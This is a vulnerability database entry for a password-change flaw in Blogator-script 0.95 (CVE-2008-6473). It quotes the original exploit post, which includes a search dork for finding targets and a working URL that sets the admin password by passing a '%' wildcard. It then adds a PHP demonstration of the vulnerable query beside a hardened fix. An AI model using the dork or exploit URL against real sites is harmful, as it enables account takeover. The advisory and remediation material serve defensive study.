Blogator-script 'init_pass2.php' User Password Change Vulnerability

Vulnerability ID: 1114933    Vulnerability type: Trust management
Published: 2008-04-05    Updated: 2009-03-25
CVE ID: CVE-2008-6473    CNNVD ID: CNNVD-200903-269
Platform: PHP    CVSS score: 6.4
|Vulnerability sources
https://www.exploit-db.com/exploits/5370
https://www.securityfocus.com/bid/28636
https://cxsecurity.com/issue/WLB-2009030178
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-269
|Vulnerability details
_blogadata/include/init_pass2.php in Blogator-script 0.95 allows remote attackers to change the password of an arbitrary user via a modified "a" parameter (the user id) combined with a "%" wildcard in the "b" parameter (the email address).
|Exploit (EXP)
##############################################################################
#                                                                            #
#  ...:::::Blogator-script 0.95 Change User Password Vulnerability ::::....  #
##############################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discovered By: virangar security team (hadihadi)

special tnx to: MR.nosrati, black.shadowes, MR.hesy, Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----------------------------------
dork: inurl:/_blogadata/
-----------------------------------
vuln code in /_blogadata/include/init_pass2.php:
line 23: $id=$_GET['a'];
line 24: $email=$_GET['b'];
line 25: $mdp=$_GET['c'];
.....
line 27: $sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE id_membre = '$id' AND email LIKE '$email' LIMIT 1");

so if we put user id for $id and put %(any) for user email($email) and $mdp=newpassword.....he he he :)
------------
vuln:
http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user id]&b=%
example:(change admin pass to 123456)
http://www.site.com/_blogadata/include/init_pass2.php?c=123456&a=1&b=%

# milw0rm.com [2008-04-05]
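The defect the advisory describes is twofold: the password is rewritten on the strength of three GET parameters with no proof that the requester owns the account, and the email check uses LIKE on an unescaped string, so a "%" in parameter b turns it into a match-all and the UPDATE lands on whichever id is supplied in parameter a. The following added example (not Blogator-script's own code and not part of the advisory) puts that query pattern beside a hardened variant and runs both against an in-memory SQLite table. The table and column names (membre, id_membre, email, pass) follow the snippet on the page; the reset_token and reset_expires columns, the sample row and the function names are assumptions made for the illustration.

```php
<?php
// Added example, not Blogator-script's own code: the vulnerable query pattern from
// init_pass2.php beside a hardened variant, run against an in-memory SQLite table.
// Table/column names (membre, id_membre, email, pass) follow the page; the
// reset_token / reset_expires columns and the function names are assumptions.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE membre (
    id_membre     INTEGER PRIMARY KEY,
    email         TEXT NOT NULL,
    pass          TEXT NOT NULL,
    reset_token   TEXT,
    reset_expires INTEGER)");
// Constructed sample row; in a real flow the token is issued by a reset-request step
// and mailed to the address on file, which is what proves ownership of the account.
$db->exec("INSERT INTO membre VALUES (1, 'admin@example.invalid', 'oldhash',
    'constructed-token', " . (time() + 3600) . ")");

// Vulnerable pattern (shape of lines 23-27 on the page): values interpolated straight
// into the SQL, no ownership check, and LIKE, so a '%' in the email matches any address.
// The original's LIMIT 1 is omitted only because stock SQLite rejects it on UPDATE.
function vulnerableChangePass(PDO $db, string $id, string $email, string $mdp): int
{
    return $db->exec("UPDATE membre SET pass = '$mdp' WHERE id_membre = '$id' AND email LIKE '$email'");
}

// Hardened variant: bound parameters, exact (=) email comparison so wildcard characters
// have no meaning, a time-limited single-use token compared in constant time, and the
// new password stored as a hash rather than in clear.
function hardenedChangePass(PDO $db, int $id, string $email, string $token, string $newPass): bool
{
    $sel = $db->prepare("SELECT reset_token, reset_expires FROM membre
                         WHERE id_membre = :id AND email = :email");
    $sel->execute([':id' => $id, ':email' => $email]);
    $row = $sel->fetch(PDO::FETCH_ASSOC);
    if ($row === false || $row['reset_token'] === null || (int)$row['reset_expires'] < time()) {
        return false; // no such id/email pair, or no live reset request for it
    }
    if (!hash_equals($row['reset_token'], $token)) {
        return false; // caller does not hold the token that was mailed out
    }
    $hash = password_hash($newPass, PASSWORD_DEFAULT);
    $upd = $db->prepare("UPDATE membre SET pass = :hash, reset_token = NULL, reset_expires = NULL
                         WHERE id_membre = :id");
    $upd->execute([':hash' => $hash, ':id' => $id]);
    return $upd->rowCount() === 1; // token is now consumed; a replay will fail above
}

// The wildcard input from the advisory (id 1, email '%') against the vulnerable query.
printf("vulnerable query, email='%%': rows changed = %d\n",
       vulnerableChangePass($db, '1', '%', 'x'));

// The same wildcard, the right address without the token, the right address with the
// token, and a replay of the consumed token, against the hardened function.
var_dump(hardenedChangePass($db, 1, '%', 'guess', 'x'));
var_dump(hardenedChangePass($db, 1, 'admin@example.invalid', 'guess', 'x'));
var_dump(hardenedChangePass($db, 1, 'admin@example.invalid', 'constructed-token', 'x'));
var_dump(hardenedChangePass($db, 1, 'admin@example.invalid', 'constructed-token', 'x'));
```

Run with `php example.php` (needs the pdo_sqlite extension). The vulnerable query reports one changed row for the "%" input, reproducing the advisory's point. Of the four hardened calls only the third succeeds: "%" is compared literally and matches no address, the right address without the token is refused, and the replay after the token has been cleared is refused as well. The two properties a reviewer should look for in a fix of this class are therefore independent: parameter binding with exact comparison closes the wildcard (and injection) path, and the token check closes the missing-authorization path; fixing only the first still leaves anyone able to reset any account whose id and email they know.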
|Affected products
Blogator-script Blogator-script 0.95
|References

Source: BUGTRAQ
Name: 20080405 Blogator-script 0.95 Change User Password Vulnerbility
Link: http://www.securityfocus.com/archive/1/archive/1/490501/100/0/threaded
Source: MILW0RM
Name: 5370
Link: http://www.milw0rm.com/exploits/5370
Source: OSVDB
Name: 51227
Link: http://osvdb.org/51227